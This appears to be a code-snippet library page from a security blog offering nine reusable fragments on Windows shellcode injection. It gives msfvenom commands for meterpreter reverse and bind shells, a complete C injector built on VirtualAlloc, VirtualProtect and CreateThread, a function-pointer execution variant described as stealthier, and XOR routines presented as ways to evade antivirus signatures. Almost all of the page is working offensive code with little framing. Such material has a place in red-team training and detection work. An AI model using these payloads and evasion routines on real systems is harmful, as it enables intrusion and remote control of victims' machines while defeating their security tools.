Biblioteca de código

Code Snippets

Colección de fragmentos de código útiles extraídos de nuestros artículos. Busca, copia y reutiliza.

9 snippets
Shell

Msfvenom - Generate Shellcode

Generate x64 Windows shellcode using msfvenom

// Shell 
# Basic calc.exe payload
msfvenom --platform windows --arch x64 -p windows/x64/exec CMD=calc.exe -f c

# Reverse shell TCP
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f c

# Bind shell (listen on port)
msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/bind_tcp \
  LPORT=4444 -f c

# Payload with XOR encoding (avoid signatures)
msfvenom --platform windows --arch x64 -p windows/x64/exec CMD=calc.exe \
  -e x64/xor -f c -i 3
msfvenom shellcode generation payload metasploit +3
Ver artículo

Shellcode Injection on Windows

C

Function Pointer - Execute Shellcode (Less Detectable)

Execute shellcode using function pointer instead of CreateThread, more stealthy but blocks main thread

// C 
// Typedef for better readability
typedef VOID (*ShellcodeFunc)();

ShellcodeFunc pShellcode = (ShellcodeFunc)shellcodeAddr;
pShellcode();  // Execute
function pointer shellcode execution stealth evasion +2
Ver artículo

Shellcode Injection on Windows

C

Complete Shellcode Injector

Full functional shellcode injector using VirtualAlloc, VirtualProtect and CreateThread

// C 
#include <windows.h>
#include <stdio.h>
#include <string.h>

typedef VOID(*ShellcodeFunc)();

int main() {
    unsigned char buf[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        // [... your shellcode here ...]
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

    size_t shellcode_size = sizeof(buf);
    printf("[*] Size: %zu bytes\n\n", shellcode_size);

    // STEP 1: Allocate memory
    PVOID shellcodeAddr = VirtualAlloc(
        NULL, shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE
    );
    if (!shellcodeAddr) {
        printf("[!] VirtualAlloc failed\n");
        return 1;
    }
    printf("[+] Memory at: 0x%p\n", shellcodeAddr);

    // STEP 2: Copy shellcode
    memcpy(shellcodeAddr, buf, shellcode_size);
    printf("[+] Shellcode copied\n");

    // STEP 3: Change permissions
    DWORD oldProtect = 0;
    if (!VirtualProtect(shellcodeAddr, shellcode_size,
        PAGE_EXECUTE_READ, &oldProtect)) {
        printf("[!] VirtualProtect failed\n");
        VirtualFree(shellcodeAddr, 0, MEM_RELEASE);
        return 1;
    }
    printf("[+] Permissions changed\n");

    // STEP 4: Execute
    HANDLE hThread = CreateThread(NULL, 0, shellcodeAddr, NULL, 0, NULL);
    if (hThread != NULL) {
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
    }
    return 0;
}
shellcode injector complete VirtualAlloc VirtualProtect +3
Ver artículo

Shellcode Injection on Windows

C

VirtualAlloc - Reserve Memory for Shellcode

Allocate memory with VirtualAlloc for shellcode injection, using MEM_COMMIT | MEM_RESERVE with PAGE_READWRITE

// C 
size_t shellcode_size = sizeof(buf);

PVOID shellcodeAddr = VirtualAlloc(
    NULL,                      // Windows chooses the address
    shellcode_size,            // Number of bytes to reserve
    MEM_COMMIT | MEM_RESERVE,  // Both flags combined
    PAGE_READWRITE             // Initial permissions
);

if (shellcodeAddr == NULL) {
    printf("Error: VirtualAlloc failed (%lu)\n", GetLastError());
    return 1;
}
VirtualAlloc memory allocation shellcode injection +3
Ver artículo

Shellcode Injection on Windows

C

VirtualProtect - Change Memory to Executable

Change memory permissions from PAGE_READWRITE to PAGE_EXECUTE_READ after copying shellcode

// C 
// Copy shellcode to memory
memcpy(shellcodeAddr, buf, shellcode_size);

// Change permissions to executable
DWORD oldProtect = 0;
BOOL result = VirtualProtect(
    shellcodeAddr,          // Address to change
    shellcode_size,         // Size
    PAGE_EXECUTE_READ,      // New permissions
    &oldProtect             // Save previous permissions
);

if (!result) {
    printf("Error: VirtualProtect failed (%lu)\n", GetLastError());
    VirtualFree(shellcodeAddr, 0, MEM_RELEASE);
    return 1;
}
VirtualProtect PAGE_EXECUTE_READ memory permissions shellcode +2
Ver artículo

Shellcode Injection on Windows

C

CreateThread - Execute Shellcode in New Thread

Execute shellcode by creating a new thread at the allocated memory address

// C 
HANDLE hThread = CreateThread(
    NULL,                                  // Default attributes
    0,                                     // Default stack size
    (LPTHREAD_START_ROUTINE)shellcodeAddr, // Address of shellcode
    NULL,                                  // No parameters
    0,                                     // Execute immediately
    NULL                                   // No ID
);

if (hThread != NULL) {
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hThread);
} else {
    printf("Error: CreateThread failed (%lu)\n", GetLastError());
    VirtualFree(shellcodeAddr, 0, MEM_RELEASE);
    return 1;
}
CreateThread shellcode execution thread WaitForSingleObject +1
Ver artículo

Shellcode Injection on Windows

C

XOR Dynamic Key - Index-Based Encryption

Encrypt/decrypt shellcode using XOR with a dynamic key that changes based on byte position (key + index).

// C 
/**
 * Encrypts/Decrypts using dynamic XOR
 * The key changes for each byte: (bKey + i) where i is the index
 *
 * Parameters:
 *  - pShellcode: Pointer to buffer
 *  - sShellcodeSize: Size of shellcode
 *  - bKey: Base key
 */
VOID XorByIndexKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (size_t i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ (bKey + i);
    }
}
XOR encryption obfuscation shellcode +2
Ver artículo

XOR Encryption: Breaking Down Encryption and Evading Signatures

C

XOR Multiple Keys - Rotor Encryption

Encrypt/decrypt shellcode using XOR with a key array that rotates cyclically. Provides 256^keySize combinations.

// C 
/**
 * Encrypts/Decrypts using XOR with key array (rotor)
 * The key repeats cyclically through the shellcode
 *
 * Parameters:
 *  - pShellcode: Pointer to shellcode buffer
 *  - sShellcodeSize: Size of shellcode
 *  - pKeyBuffer: Pointer to array of bytes containing the key
 *  - sKeySize: Size of the key array
 */
VOID XorByMultipleKeys(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize,
                       IN PBYTE pKeyBuffer, IN SIZE_T sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ pKeyBuffer[j];

        // Rotate the key index
        j = (j + 1) % sKeySize;
    }
}
XOR encryption obfuscation shellcode +3
Ver artículo

XOR Encryption: Breaking Down Encryption and Evading Signatures

C

XOR Single Key - Basic Shellcode Encryption

Encrypt/decrypt shellcode using XOR with a single-byte key. Simple but only 256 possible keys.

// C 
/**
 * Encrypts/Decrypts a shellcode using XOR with a single-byte key
 *
 * Parameters:
 *  - pShellcode: Pointer to buffer containing the shellcode
 *  - sShellcodeSize: Size in bytes of the shellcode
 *  - bKey: A byte that acts as the key
 */
VOID XorByOneKey(IN PBYTE pShellcode, IN SIZE_T sShellcodeSize, IN BYTE bKey) {
    for (size_t i = 0; i < sShellcodeSize; i++) {
        pShellcode[i] = pShellcode[i] ^ bKey;
    }
}
XOR encryption obfuscation shellcode +2
Ver artículo

XOR Encryption: Breaking Down Encryption and Evading Signatures